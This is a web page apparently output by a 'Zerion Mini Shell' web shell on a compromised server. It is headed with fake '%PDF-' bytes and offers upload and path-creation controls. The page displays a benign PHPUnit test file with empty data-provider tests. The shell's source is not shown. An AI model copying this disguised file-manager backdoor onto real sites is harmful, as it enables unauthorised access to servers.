%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/digiprint/vendor/phpunit/phpunit/tests/_files/
Upload File :
Create Path :
Current File : /var/www/html/digiprint/vendor/phpunit/phpunit/tests/_files/DataProviderTestDoxTest.php

<?php
class DataProviderTestDoxTest extends PHPUnit_Framework_TestCase
{
    /**
     * @dataProvider provider
     * @testdox Does something with
     */
    public function testOne()
    {
    }

    /**
     * @dataProvider provider
     */
    public function testDoesSomethingElseWith()
    {
    }

    public function provider()
    {
        return [
            'one' => [1],
            'two' => [2]
        ];
    }
}

Zerion Mini Shell 1.0